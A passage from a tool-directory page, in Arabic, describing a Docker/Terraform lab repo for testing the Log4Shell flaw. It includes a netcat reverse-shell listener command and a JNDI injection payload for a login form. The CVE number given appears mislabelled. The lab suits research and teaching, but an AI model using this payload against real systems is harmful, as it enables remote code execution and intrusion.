Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4jtest — # موارد Terraform وDocker للإعداد السريع لاختبار CVE-2021-44428 | Kitploit
أدوات/GitHubGitHub/z3bul0n/log4jtest
أمن البنية التحتية السحابيةأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليم
GitHubz3bul0n/log4jtest

log4jtest

# موارد Terraform وDocker للإعداد السريع لاختبار CVE-2021-44428

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مقدمة

تم إعداد هذا المستودع لاختبار ثغرة log4j بسرعة باستخدام Docker و Hashicorp Terraform. جميع مكونات هذا الاختبار ستعمل داخل حاويات Docker على شبكة Docker، ويمكن الوصول إليها عبر 'host.docker.internal'.

الاعتمادات / إخلاء المسؤولية

بيئة الاختبار هذه مشتقة من مقالة رائعة على مدونة Raxis: (https://raxis.com/blog/log4j-exploit)

التطبيق الضعيف وكود الاستغلال جاءا من cyberxml (https://github.com/cyberxml/log4j-poc).

كل ما قمت به هو توثيق البيئة لتسهيل تشغيل واختبار هذا الاستغلال اللذيذ.

أنا لا أتحمل أي مسؤولية عن الآثار السلبية أو الإجراءات الخبيثة التي قد تنتج عن استخدام المواد الموجودة في هذا المستودع. نقطة وانتهى. الأمر متروك لك لتقرر ما إذا كانت هذه المواد جديرة بالثقة، ومن مسؤوليتك أيضًا استخدام هذه المعلومات بشكل أخلاقي. أنا فقط أنشر هذه الأشياء الجيدة حتى يتمكن الباحثون والطلاب ومتخصصو الأمن من إنشاء بيئة بسرعة واختبار الاستغلال بأنفسهم. Seacrest out.

المتطلبات الأساسية

  • Docker Desktop (https://www.docker.com/)
  • Hashicorp Terraform (https://www.terraform.io/)

الإعداد

  1. استنسخ هذا المستودع
  2. شغّل 'terraform init' في دليل المشروع
  3. ابدأ تشغيل Docker daemon
  4. شغّل سكربت bash 'docker-build.sh' لبناء جميع صور حاويات المشروع.
  5. شغّل 'terraform apply' لإنشاء جميع الحاويات في المشروع.

الاستغلال

  1. ادخل إلى حاوية log4j_netcat باستخدام 'docker exec -it netcat /bin/bash' أو أمر مشابه. هنا ستستقبل اتصال الصدفة الخاص بك إلى الخادم الضحية بمجرد إنشائه.

  2. داخل جلستك في حاوية log4j_netcat، أدخل الأمر التالي لبدء المستمع:

root@kitploit:~
nc -lv -s 0.0.0.0 -p 9001
  1. في متصفحك، انتقل إلى http://host.docker.internal:8080/log4shell/

  2. أدخل ما يلي في حقل 'Username' مع أي شيء تريده في حقل 'Password':

root@kitploit:~
${jndi:ldap://host.docker.internal:1389/a}
  1. عد إلى صدفة حاوية log4j_netcat ولاحظ أنك اتصلت بالخادم الضحية.

  2. اذهب وأحدث الفوضى!

تنزيل الأداة